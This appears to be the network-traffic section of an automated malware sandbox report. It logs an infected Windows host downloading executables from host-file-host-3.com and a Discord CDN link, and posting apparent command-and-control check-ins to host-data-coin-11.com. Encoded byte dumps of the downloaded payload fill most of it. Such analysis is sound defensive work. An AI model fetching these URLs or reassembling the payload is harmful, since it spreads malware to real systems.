Dec 1, 2021 10:04:28.043939114 CET | 1104 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:28 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
60 | 192.168.2.3 | 49849 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.3 | 49755 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:28.422101021 CET | 1105 | OUT | GET /files/8723_1638191106_2017.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: host-file-host-3.com
Dec 1, 2021 10:04:28.505357027 CET | 1106 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:28 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 1285856
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Last-Modified: Mon, 29 Nov 2021 13:05:06 GMT
                                                                                                                                                                                ETag: "139ee0-5d1ed16faf7da"
                                                                                                                                                                                Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49756 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:35.575402975 CET | 2439 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://mojyvpeoe.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 334
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:35.683629036 CET | 2440 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:35 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.3 | 49757 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:35.787384033 CET | 2441 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://yaoomuahu.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 364
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:35.886334896 CET | 2441 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:35 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49759 | 162.159.135.233 | 443 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
2021-12-01 09:04:36 UTC | 0 | OUT | GET /attachments/914960103592054858/914961866462232616/Oldening.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: cdn.discordapp.com
2021-12-01 09:04:36 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:36 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 397824
                                                                                                                                                                                Connection: close
                                                                                                                                                                                CF-Ray: 6b6b26224e6142d5-FRA
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Age: 134795
                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                Content-Disposition: attachment;%20filename=Oldening.exe
                                                                                                                                                                                ETag: "5115e5dab211559a85cd0154e8100f53"
                                                                                                                                                                                Expires: Thu, 01 Dec 2022 09:04:36 GMT
                                                                                                                                                                                Last-Modified: Mon, 29 Nov 2021 19:31:48 GMT
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                x-goog-generation: 1638214308199102
                                                                                                                                                                                x-goog-hash: crc32c=YIGNXA==
                                                                                                                                                                                x-goog-hash: md5=URXl2rIRVZqFzQFU6BAPUw==
                                                                                                                                                                                x-goog-metageneration: 1
                                                                                                                                                                                x-goog-storage-class: STANDARD
                                                                                                                                                                                x-goog-stored-content-encoding: identity
                                                                                                                                                                                x-goog-stored-content-length: 397824
                                                                                                                                                                                X-GUploader-UploadID: ADPycdvBnSbnjnhwzbmKVJY4AfYuSX_vGG4T8mybDbmzzEh5wTvKrUq6ILGhBDBk0UwTHNlT6meCPadacrFAck7K5BAkDWKQDw
                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                Data Ascii: YjFrQUFBcHZXd0FBQ2d3clBBaHZEd0FBQ25RWEFBQUJLQXNBQUFZTkNXOUlBUUFHY2lzQ0FIQW9QUUFBQ2l3WkNXOUlBUUFHY2lzQ0FIQW9QUUFBQ2l3SEJnbHZQZ0FB
                                                                                                                                                                                2021-12-01 09:04:36 UTC34INData Raw: 00 57 00 64 00 48 00 59 00 6a 00 42 00 6e 00 51 00 6b 00 46 00 42 00 57 00 58 00 4a 00 43 00 57 00 45 00 6c 00 79 00 51 00 57 00 64 00 43 00 64 00 32 00 49 00 77 00 61 00 30 00 4a 00 42 00 51 00 56 00 6c 00 48 00 51 00 6d 00 30 00 35 00 53 00 30 00 46 00 52 00 51 00 55 00 64 00 4c 00 51 00 31 00 6c 00 42 00 51 00 55 00 46 00 76 00 64 00 45 00 4e 00 42 00 57 00 6e 00 5a 00 54 00 5a 00 30 00 56 00 42 00 51 00 6d 00 6c 00 7a 00 52 00 6d 00 4e 00 70 00 63 00 30 00 4e 00 42 00 53 00 45 00 4a 00 32 00 55 00 33 00 64 00 46 00 51 00 55 00 4a 00 6e 00 57 00 55 00 64 00 69 00 4d 00 48 00 64 00 43 00 51 00 55 00 46 00 5a 00 62 00 30 00 70 00 6e 00 51 00 55 00 46 00 44 00 61 00 54 00 42 00 4a 00 51 00 6d 00 30 00 35 00 54 00 55 00 46 00 52 00 51 00 55 00 64 00 4c 00
                                                                                                                                                                                Data Ascii: WdHYjBnQkFBWXJCWElyQWdCd2Iwa0JBQVlHQm05S0FRQUdLQ1lBQUFvdENBWnZTZ0VBQmlzRmNpc0NBSEJ2U3dFQUJnWUdiMHdCQUFZb0pnQUFDaTBJQm05TUFRQUdL
                                                                                                                                                                                2021-12-01 09:04:36 UTC36INData Raw: 55 00 4a 00 42 00 51 00 56 00 6c 00 73 00 52 00 56 00 46 00 53 00 65 00 6c 00 70 00 42 00 51 00 55 00 46 00 44 00 62 00 54 00 6c 00 73 00 51 00 55 00 46 00 42 00 53 00 32 00 4a 00 35 00 55 00 55 00 4a 00 42 00 51 00 56 00 6c 00 73 00 52 00 56 00 46 00 52 00 62 00 30 00 52 00 6e 00 51 00 55 00 46 00 43 00 62 00 6b 00 35 00 74 00 51 00 55 00 46 00 42 00 53 00 32 00 4a 00 35 00 64 00 30 00 4a 00 42 00 51 00 56 00 6c 00 73 00 59 00 33 00 70 00 5a 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 4b 00 5a 00 30 00 56 00 42 00 51 00 6d 00 6c 00 57 00 65 00 6c 00 4a 00 6e 00 51 00 55 00 46 00 44 00 62 00 54 00 68 00 76 00 51 00 56 00 46 00 42 00 52 00 30 00 70 00 59 00 54 00 6b 00 6c 00 42 00 51 00 55 00 46 00 4c 00 59 00 6e 00 6c 00 76 00 51 00 6b 00 46 00 42 00 57
                                                                                                                                                                                Data Ascii: UJBQVlsRVFSelpBQUFDbTlsQUFBS2J5UUJBQVlsRVFRb0RnQUFCbk5tQUFBS2J5d0JBQVlsY3pZQUFBcHZKZ0VBQmlWelJnQUFDbThvQVFBR0pYTklBQUFLYnlvQkFBW
                                                                                                                                                                                2021-12-01 09:04:36 UTC37INData Raw: 00 4e 00 70 00 5a 00 32 00 5a 00 42 00 51 00 55 00 46 00 4c 00 59 00 6a 00 59 00 77 00 51 00 55 00 46 00 42 00 57 00 6e 00 5a 00 50 00 64 00 30 00 46 00 42 00 51 00 32 00 35 00 4e 00 64 00 30 00 46 00 52 00 51 00 55 00 64 00 46 00 64 00 31 00 6c 00 53 00 51 00 6d 00 64 00 6e 00 55 00 6b 00 4a 00 43 00 63 00 55 00 35 00 58 00 5a 00 30 00 46 00 42 00 51 00 56 00 4e 00 59 00 55 00 54 00 5a 00 33 00 51 00 55 00 46 00 43 00 51 00 32 00 63 00 7a 00 51 00 55 00 46 00 42 00 53 00 32 00 4e 00 36 00 5a 00 30 00 46 00 42 00 51 00 58 00 42 00 32 00 63 00 6c 00 46 00 42 00 51 00 55 00 4a 00 74 00 4f 00 44 00 64 00 42 00 51 00 55 00 46 00 4c 00 59 00 6e 00 70 00 4a 00 51 00 6b 00 46 00 42 00 57 00 56 00 4a 00 43 00 5a 00 32 00 64 00 53 00 51 00 6b 00 4a 00 78 00 54 00
                                                                                                                                                                                Data Ascii: NpZ2ZBQUFLYjYwQUFBWnZPd0FBQ25Nd0FRQUdFd1lSQmdnUkJCcU5XZ0FBQVNYUTZ3QUFCQ2czQUFBS2N6Z0FBQXB2clFBQUJtODdBQUFLYnpJQkFBWVJCZ2dSQkJxT
                                                                                                                                                                                2021-12-01 09:04:36 UTC39INData Raw: 64 00 42 00 51 00 55 00 46 00 53 00 63 00 33 00 64 00 43 00 55 00 55 00 4a 00 36 00 51 00 55 00 46 00 42 00 51 00 55 00 52 00 6e 00 51 00 55 00 46 00 46 00 57 00 44 00 52 00 6c 00 51 00 55 00 46 00 42 00 53 00 30 00 4e 00 6e 00 53 00 57 00 5a 00 44 00 62 00 7a 00 46 00 68 00 51 00 55 00 46 00 42 00 51 00 6b 00 70 00 6b 00 51 00 32 00 39 00 42 00 51 00 55 00 46 00 46 00 53 00 30 00 52 00 6a 00 51 00 55 00 46 00 42 00 63 00 48 00 70 00 50 00 51 00 55 00 46 00 42 00 51 00 32 00 6c 00 6f 00 61 00 6b 00 46 00 42 00 51 00 55 00 74 00 6d 00 61 00 44 00 52 00 42 00 51 00 55 00 46 00 77 00 64 00 6b 00 68 00 33 00 51 00 55 00 46 00 44 00 61 00 45 00 46 00 42 00 51 00 57 00 68 00 6c 00 54 00 6c 00 64 00 6e 00 51 00 55 00 46 00 42 00 55 00 31 00 56 00 58 00 53 00 44
                                                                                                                                                                                Data Ascii: dBQUFSc3dCUUJ6QUFBQURnQUFFWDRlQUFBS0NnSWZDbzFhQUFBQkpkQ29BQUFFS0RjQUFBcHpPQUFBQ2loakFBQUtmaDRBQUFwdkh3QUFDaEFBQWhlTldnQUFBU1VXSD
                                                                                                                                                                                2021-12-01 09:04:36 UTC40INData Raw: 00 76 00 51 00 55 00 46 00 42 00 53 00 30 00 78 00 52 00 59 00 30 00 64 00 45 00 54 00 6a 00 4a 00 6a 00 51 00 56 00 46 00 42 00 51 00 55 00 4a 00 34 00 4f 00 46 00 6c 00 71 00 56 00 6d 00 39 00 42 00 51 00 55 00 46 00 46 00 62 00 44 00 42 00 50 00 62 00 30 00 46 00 42 00 51 00 56 00 46 00 76 00 54 00 6e 00 64 00 42 00 51 00 55 00 4e 00 75 00 54 00 54 00 52 00 42 00 51 00 55 00 46 00 4c 00 59 00 33 00 5a 00 7a 00 52 00 45 00 46 00 49 00 51 00 69 00 74 00 49 00 5a 00 30 00 46 00 42 00 51 00 32 00 6c 00 6e 00 5a 00 6b 00 46 00 42 00 51 00 55 00 74 00 69 00 4d 00 6d 00 74 00 42 00 51 00 55 00 46 00 76 00 54 00 6b 00 5a 00 6f 00 54 00 55 00 56 00 50 00 52 00 6c 00 6c 00 43 00 51 00 55 00 46 00 42 00 53 00 6b 00 56 00 52 00 55 00 32 00 46 00 69 00 4d 00 6d 00
                                                                                                                                                                                Data Ascii: vQUFBS0xRY0dETjJjQVFBQUJ4OFlqVm9BQUFFbDBPb0FBQVFvTndBQUNuTTRBQUFLY3ZzREFIQitIZ0FBQ2lnZkFBQUtiMmtBQUFvTkZoTUVPRllCQUFBSkVRU2FiMm
                                                                                                                                                                                2021-12-01 09:04:36 UTC41INData Raw: 46 00 55 00 56 00 6c 00 59 00 56 00 30 00 4a 00 4e 00 52 00 30 00 56 00 52 00 57 00 56 00 4a 00 43 00 57 00 54 00 56 00 77 00 55 00 44 00 68 00 51 00 4b 00 79 00 38 00 76 00 4f 00 46 00 4a 00 43 00 51 00 6d 00 52 00 5a 00 52 00 58 00 64 00 52 00 55 00 6b 00 4a 00 42 00 62 00 55 00 39 00 68 00 56 00 43 00 74 00 6e 00 4c 00 33 00 59 00 76 00 4c 00 7a 00 4e 00 6e 00 54 00 57 00 30 00 7a 00 5a 00 30 00 46 00 48 00 53 00 32 00 64 00 6e 00 63 00 55 00 46 00 42 00 51 00 55 00 46 00 52 00 56 00 46 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 33 00 56 00 42 00 51 00 55 00 46 00 42 00 53 00 57 00 64 00 46 00 51 00 55 00 46 00 4f 00 51 00 55 00 4a 00 42 00 51 00 55 00 46 00 45 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 6e 00 51 00 55 00 46
                                                                                                                                                                                Data Ascii: FUVlYV0JNR0VRWVJCWTVwUDhQKy8vOFJCQmRZRXdRUkJBbU9hVCtnL3YvLzNnTW0zZ0FHS2dncUFBQUFRVFFBQUFBQUFBQ3VBQUFBSWdFQUFOQUJBQUFEQUFBQUNnQUF
                                                                                                                                                                                2021-12-01 09:04:36 UTC43INData Raw: 00 57 00 55 00 46 00 6a 00 53 00 45 00 70 00 61 00 51 00 6d 00 64 00 43 00 64 00 32 00 5a 00 6f 00 4e 00 45 00 46 00 42 00 51 00 57 00 39 00 76 00 53 00 48 00 64 00 42 00 51 00 55 00 4e 00 70 00 61 00 6d 00 4a 00 42 00 51 00 55 00 46 00 48 00 53 00 30 00 46 00 33 00 51 00 55 00 46 00 44 00 63 00 30 00 52 00 69 00 4c 00 33 00 4e 00 43 00 51 00 55 00 46 00 5a 00 63 00 58 00 70 00 6e 00 53 00 57 00 39 00 47 00 55 00 55 00 46 00 42 00 51 00 6d 00 35 00 4b 00 64 00 45 00 4a 00 6e 00 51 00 6e 00 64 00 6a 00 63 00 32 00 4e 00 48 00 51 00 55 00 68 00 43 00 4b 00 30 00 68 00 6e 00 51 00 55 00 46 00 44 00 61 00 57 00 64 00 6d 00 51 00 55 00 46 00 42 00 53 00 30 00 74 00 4f 00 63 00 30 00 46 00 42 00 51 00 56 00 6c 00 76 00 52 00 46 00 46 00 42 00 51 00 55 00 74 00
                                                                                                                                                                                Data Ascii: WUFjSEpaQmdCd2ZoNEFBQW9vSHdBQUNpamJBQUFHS0F3QUFDc0RiL3NCQUFZcXpnSW9GUUFBQm5KdEJnQndjc2NHQUhCK0hnQUFDaWdmQUFBS0tOc0FBQVlvRFFBQUt
                                                                                                                                                                                2021-12-01 09:04:36 UTC44INData Raw: 57 00 6b 00 4e 00 43 00 57 00 57 00 5a 00 46 00 51 00 32 00 68 00 32 00 51 00 55 00 46 00 42 00 53 00 30 00 4a 00 34 00 57 00 55 00 70 00 47 00 5a 00 32 00 56 00 50 00 59 00 56 00 46 00 70 00 54 00 32 00 46 00 57 00 61 00 32 00 39 00 69 00 64 00 30 00 46 00 42 00 51 00 32 00 35 00 4e 00 56 00 45 00 46 00 42 00 51 00 55 00 64 00 42 00 64 00 31 00 6c 00 56 00 51 00 31 00 46 00 6f 00 64 00 6b 00 6c 00 42 00 51 00 55 00 46 00 43 00 61 00 45 00 31 00 46 00 4d 00 32 00 64 00 56 00 62 00 54 00 4e 00 6e 00 51 00 56 00 56 00 4c 00 61 00 45 00 56 00 46 00 53 00 32 00 64 00 42 00 51 00 55 00 46 00 53 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 53 00 47 00 64 00 43 00 61 00 32 00 64 00 6e 00 51 00 55 00 52 00 45 00 64 00 30 00 46 00 42 00 51 00 56 00 4a 00 7a
                                                                                                                                                                                Data Ascii: WkNCWWZFQ2h2QUFBS0J4WUpGZ2VPYVFpT2FWa29id0FBQ25NVEFBQUdBd1lVQ1FodklBQUFCaE1FM2dVbTNnQVVLaEVFS2dBQUFSQUFBQUFBSGdCa2dnQUREd0FBQVJz
                                                                                                                                                                                2021-12-01 09:04:36 UTC45INData Raw: 00 6b 00 4a 00 5a 00 62 00 30 00 5a 00 6e 00 51 00 55 00 46 00 43 00 61 00 58 00 64 00 48 00 59 00 7a 00 4e 00 46 00 51 00 55 00 46 00 42 00 63 00 44 00 5a 00 4c 00 53 00 46 00 56 00 42 00 51 00 55 00 46 00 76 00 52 00 6d 00 49 00 7a 00 51 00 55 00 46 00 42 00 51 00 57 00 39 00 4d 00 51 00 57 00 64 00 61 00 65 00 57 00 35 00 33 00 5a 00 30 00 46 00 6a 00 51 00 57 00 4e 00 49 00 61 00 6d 00 31 00 72 00 56 00 30 00 74 00 43 00 63 00 30 00 46 00 42 00 51 00 56 00 6c 00 7a 00 51 00 6d 00 35 00 4f 00 65 00 45 00 46 00 42 00 51 00 55 00 74 00 6c 00 5a 00 31 00 6c 00 78 00 52 00 58 00 70 00 42 00 53 00 30 00 46 00 48 00 4f 00 45 00 46 00 42 00 51 00 55 00 46 00 57 00 51 00 55 00 46 00 42 00 55 00 6b 00 46 00 6e 00 54 00 6e 00 6c 00 31 00 55 00 57 00 64 00 42 00
                                                                                                                                                                                Data Ascii: kJZb0ZnQUFCaXdHYzNFQUFBcDZLSFVBQUFvRmIzQUFBQW9MQWdaeW53Z0FjQWNIam1rV0tCc0FBQVlzQm5OeEFBQUtlZ1lxRXpBS0FHOEFBQUFWQUFBUkFnTnl1UWdB
                                                                                                                                                                                2021-12-01 09:04:36 UTC47INData Raw: 55 00 46 00 4c 00 59 00 33 00 70 00 6e 00 51 00 55 00 46 00 42 00 62 00 32 00 39 00 69 00 5a 00 30 00 46 00 42 00 51 00 32 00 64 00 4b 00 64 00 6d 00 4e 00 42 00 51 00 55 00 46 00 44 00 5a 00 30 00 31 00 46 00 53 00 30 00 4e 00 6a 00 51 00 55 00 46 00 42 00 57 00 6e 00 5a 00 5a 00 55 00 55 00 46 00 42 00 51 00 32 00 6c 00 76 00 51 00 55 00 46 00 43 00 63 00 33 00 64 00 42 00 64 00 30 00 46 00 6b 00 51 00 55 00 46 00 42 00 51 00 55 00 56 00 33 00 51 00 55 00 46 00 46 00 55 00 55 00 6c 00 7a 00 51 00 6b 00 46 00 4c 00 54 00 30 00 78 00 52 00 55 00 56 00 56 00 44 00 64 00 44 00 52 00 52 00 51 00 57 00 64 00 52 00 52 00 45 00 74 00 49 00 61 00 30 00 46 00 42 00 51 00 57 00 39 00 4c 00 4d 00 32 00 64 00 56 00 62 00 55 00 5a 00 42 00 63 00 6d 00 56 00 42 00 51
                                                                                                                                                                                Data Ascii: UFLY3pnQUFBb29iZ0FBQ2dKdmNBQUFDZ01FS0NjQUFBWnZZUUFBQ2lvQUFCc3dBd0FkQUFBQUV3QUFFUUlzQkFLT0xRUVVDdDRRQWdRREtIa0FBQW9LM2dVbUZBcmVBQ
                                                                                                                                                                                2021-12-01 09:04:36 UTC48INData Raw: 00 52 00 69 00 4e 00 45 00 31 00 42 00 51 00 55 00 46 00 77 00 5a 00 47 00 4a 00 35 00 59 00 30 00 46 00 42 00 51 00 58 00 42 00 6f 00 61 00 6b 00 68 00 4e 00 51 00 55 00 46 00 42 00 52 00 57 00 46 00 4c 00 53 00 56 00 46 00 42 00 51 00 55 00 46 00 77 00 64 00 6d 00 68 00 52 00 51 00 55 00 46 00 44 00 61 00 56 00 6c 00 49 00 52 00 6a 00 46 00 6e 00 54 00 45 00 4a 00 33 00 53 00 6e 00 5a 00 6e 00 64 00 30 00 46 00 42 00 51 00 32 00 70 00 4d 00 54 00 45 00 4a 00 74 00 4b 00 30 00 64 00 42 00 51 00 55 00 46 00 4c 00 53 00 32 00 31 00 4a 00 51 00 32 00 49 00 30 00 59 00 30 00 46 00 42 00 51 00 57 00 39 00 58 00 51 00 57 00 30 00 72 00 52 00 45 00 46 00 42 00 51 00 55 00 74 00 4c 00 53 00 57 00 64 00 42 00 51 00 55 00 46 00 76 00 62 00 30 00 78 00 42 00 51 00
                                                                                                                                                                                Data Ascii: RiNE1BQUFwZGJ5Y0FBQXBoakhNQUFBRWFLSVFBQUFwdmhRQUFDaVlIRjFnTEJ3SnZnd0FBQ2pMTEJtK0dBQUFLS21JQ2I0Y0FBQW9XQW0rREFBQUtLSWdBQUFvb0xBQ
                                                                                                                                                                                2021-12-01 09:04:36 UTC49INData Raw: 46 00 42 00 51 00 56 00 4a 00 42 00 62 00 6e 00 4e 00 44 00 51 00 55 00 46 00 42 00 52 00 57 00 4a 00 33 00 55 00 55 00 4a 00 42 00 51 00 56 00 6c 00 4c 00 4d 00 32 00 64 00 56 00 62 00 55 00 5a 00 6e 00 63 00 6d 00 56 00 42 00 51 00 56 00 6c 00 78 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 53 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 54 00 30 00 52 00 6e 00 51 00 55 00 5a 00 45 00 64 00 30 00 46 00 42 00 51 00 56 00 4a 00 7a 00 64 00 30 00 46 00 6e 00 51 00 56 00 68 00 42 00 51 00 55 00 46 00 42 00 52 00 33 00 64 00 42 00 51 00 55 00 56 00 52 00 53 00 6a 00 64 00 42 00 5a 00 30 00 46 00 42 00 51 00 6b 00 46 00 4f 00 64 00 6b 00 4a 00 6e 00 52 00 55 00 46 00 43 00 61 00 47 00 4e 00 4c 00 4d 00 32 00 64 00 56 00 62 00 55
                                                                                                                                                                                Data Ascii: FBQVJBbnNDQUFBRWJ3UUJBQVlLM2dVbUZncmVBQVlxQUFBQUFSQUFBQUFBQUFBT0RnQUZEd0FBQVJzd0FnQVhBQUFBR3dBQUVRSjdBZ0FBQkFOdkJnRUFCaGNLM2dVbU
                                                                                                                                                                                2021-12-01 09:04:36 UTC51INData Raw: 00 4a 00 51 00 55 00 46 00 42 00 55 00 55 00 52 00 69 00 64 00 32 00 74 00 43 00 51 00 55 00 46 00 5a 00 53 00 7a 00 4e 00 6e 00 56 00 57 00 31 00 47 00 5a 00 33 00 4a 00 6c 00 51 00 55 00 46 00 5a 00 63 00 55 00 46 00 42 00 51 00 55 00 4a 00 46 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 4f 00 46 00 42 00 42 00 51 00 56 00 56 00 51 00 51 00 55 00 46 00 42 00 51 00 6b 00 64 00 36 00 51 00 55 00 4e 00 42 00 51 00 6c 00 6c 00 42 00 51 00 55 00 46 00 42 00 59 00 30 00 46 00 42 00 51 00 56 00 4a 00 42 00 62 00 6e 00 4e 00 44 00 51 00 55 00 46 00 42 00 52 00 55 00 45 00 79 00 4f 00 46 00 6c 00 42 00 55 00 55 00 46 00 48 00 51 00 33 00 51 00 30 00 52 00 6b 00 70 00 6f 00 57 00 55 00 73 00 7a 00 5a 00 30 00 46 00 48 00 53 00 32 00
                                                                                                                                                                                Data Ascii: JQUFBUURid2tCQUFZSzNnVW1GZ3JlQUFZcUFBQUJFQUFBQUFBQUFBOFBBQVVQQUFBQkd6QUNBQllBQUFBY0FBQVJBbnNDQUFBRUEyOFlBUUFHQ3Q0RkpoWUszZ0FHS2
                                                                                                                                                                                2021-12-01 09:04:36 UTC52INData Raw: 42 00 51 00 56 00 4a 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 51 00 52 00 48 00 64 00 42 00 52 00 6b 00 52 00 33 00 51 00 55 00 46 00 42 00 55 00 6e 00 4e 00 33 00 51 00 57 00 64 00 42 00 56 00 30 00 46 00 42 00 51 00 55 00 46 00 49 00 51 00 55 00 46 00 42 00 52 00 56 00 46 00 4b 00 4e 00 30 00 46 00 6e 00 51 00 55 00 46 00 43 00 51 00 55 00 35 00 32 00 52 00 6c 00 46 00 46 00 51 00 55 00 4a 00 6e 00 63 00 6d 00 56 00 43 00 55 00 31 00 6c 00 58 00 51 00 33 00 51 00 30 00 51 00 55 00 4a 00 70 00 62 00 30 00 46 00 42 00 51 00 55 00 56 00 52 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 45 00 64 00 7a 00 68 00 42 00 51 00 6c 00 45 00 34 00 51 00 55 00 46 00 42 00 52 00 57 00 4a 00 4e 00 51 00 55 00 6c
                                                                                                                                                                                Data Ascii: BQVJBQUFBQUFBQUFQRHdBRkR3QUFBUnN3QWdBV0FBQUFIQUFBRVFKN0FnQUFCQU52RlFFQUJncmVCU1lXQ3Q0QUJpb0FBQUVRQUFBQUFBQUFEdzhBQlE4QUFBRWJNQUl
                                                                                                                                                                                2021-12-01 09:04:36 UTC53INData Raw: 00 51 00 55 00 46 00 42 00 51 00 55 00 4a 00 7a 00 51 00 55 00 46 00 43 00 52 00 55 00 56 00 42 00 62 00 6e 00 4e 00 44 00 51 00 55 00 46 00 42 00 52 00 55 00 45 00 79 00 4f 00 47 00 46 00 42 00 55 00 55 00 46 00 48 00 56 00 56 00 4a 00 6a 00 53 00 7a 00 4e 00 6e 00 64 00 32 00 31 00 43 00 53 00 45 00 39 00 59 00 51 00 55 00 46 00 42 00 53 00 31 00 56 00 53 00 57 00 55 00 73 00 7a 00 5a 00 30 00 46 00 48 00 53 00 32 00 64 00 46 00 55 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 52 00 57 00 68 00 4a 00 51 00 55 00 52 00 42 00 4f 00 45 00 46 00 42 00 51 00 55 00 56 00 69 00 54 00 55 00 46 00 4e 00 51 00 55 00 64 00 42 00 51 00 55 00 46 00 42 00 51 00 6e 00 4e 00 42 00 51 00 55 00 4a 00 46 00 51 00 32 00 56 00 33 00 53 00 55 00 46 00
                                                                                                                                                                                Data Ascii: QUFBQUJzQUFCRUVBbnNDQUFBRUEyOGFBUUFHVVJjSzNnd21CSE9YQUFBS1VSWUszZ0FHS2dFUUFBQUFBQUFBRWhJQURBOEFBQUViTUFNQUdBQUFBQnNBQUJFQ2V3SUF
                                                                                                                                                                                2021-12-01 09:04:36 UTC57INData Raw: 39 00 74 00 51 00 55 00 46 00 42 00 53 00 32 00 5a 00 52 00 51 00 55 00 4a 00 42 00 51 00 56 00 46 00 76 00 61 00 47 00 64 00 42 00 51 00 55 00 4a 00 6e 00 59 00 69 00 74 00 43 00 5a 00 31 00 6c 00 44 00 51 00 55 00 46 00 61 00 65 00 6e 00 42 00 33 00 51 00 55 00 46 00 44 00 61 00 57 00 64 00 52 00 51 00 55 00 46 00 42 00 63 00 6b 00 74 00 43 00 52 00 55 00 46 00 42 00 51 00 33 00 4e 00 76 00 61 00 48 00 64 00 42 00 51 00 55 00 4a 00 70 00 61 00 55 00 6c 00 42 00 51 00 55 00 46 00 48 00 51 00 6e 00 59 00 30 00 52 00 30 00 4a 00 33 00 53 00 55 00 46 00 43 00 62 00 6b 00 39 00 75 00 51 00 55 00 46 00 42 00 53 00 30 00 74 00 43 00 51 00 55 00 46 00 42 00 51 00 33 00 4e 00 76 00 52 00 56 00 46 00 42 00 51 00 55 00 74 00 35 00 61 00 55 00 70 00 42 00 51 00 55
                                                                                                                                                                                Data Ascii: 9tQUFBS2ZRQUJBQVFvaGdBQUJnYitCZ1lDQUFaenB3QUFDaWdRQUFBcktCRUFBQ3NvaHdBQUJpaUlBQUFHQnY0R0J3SUFCbk9uQUFBS0tCQUFBQ3NvRVFBQUt5aUpBQU
